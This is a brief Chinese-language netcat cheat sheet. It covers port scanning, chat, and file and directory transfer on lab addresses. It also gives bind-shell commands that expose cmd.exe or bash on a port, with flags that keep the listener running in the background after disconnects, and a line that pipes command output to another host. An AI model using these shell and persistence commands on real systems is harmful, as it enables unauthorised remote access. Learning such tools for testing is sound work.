扫描端口
nc -z -v -n 192.168.10.100 20-200
连接服务
nc -v 192.168.10.100 21
开启服务
nc -l -p 444
聊天
一台开启444端口:nc -l -p 444
另一台连接444端口:nc -v 192.168.10.100 444
然后就可以传输文本了
传输文件
nc -v 192.168.137.128 444<1.txt
nc -l -p 444 > 2.txt
传输目录
监听压缩发送 tar -cvf - dir/ | nc -lp 555 -q 1
连接解压接收 nc 192.168.137.130 555 | tar -xvf -
反向模式:
nc -lp 444 -q 1 | tar xvf -
tar -cvf - dir/ | nc 192.168.137.128 444
-q 1 参数,在文件发送端有用,当文件传输完后1秒退出
连接windows-shell
win:
nc -lp 444 -e c:windowssystem32cmd.exe
kali:
nc 192.168.137.1 444
但是这样的连接是一次性的,如果想长久连接添加下面两个参数
-L 但某个连接断开后,不关闭服务,重新侦听
-d 从终端上分离,进入后台进程,也就是说终端被关闭了也不会断开服务
-e 指定连接成功后执行的程序
连接linux-shell
linux:
nc -lp 444 -c bash
win:
nc 192.168.137.128 444
执行命令重定向结果
lin: ifconfig | nc -n 192.168.137.1 444
win: nc -lp 444
windows隐藏小技巧
Shift+右键可以直接打开cmd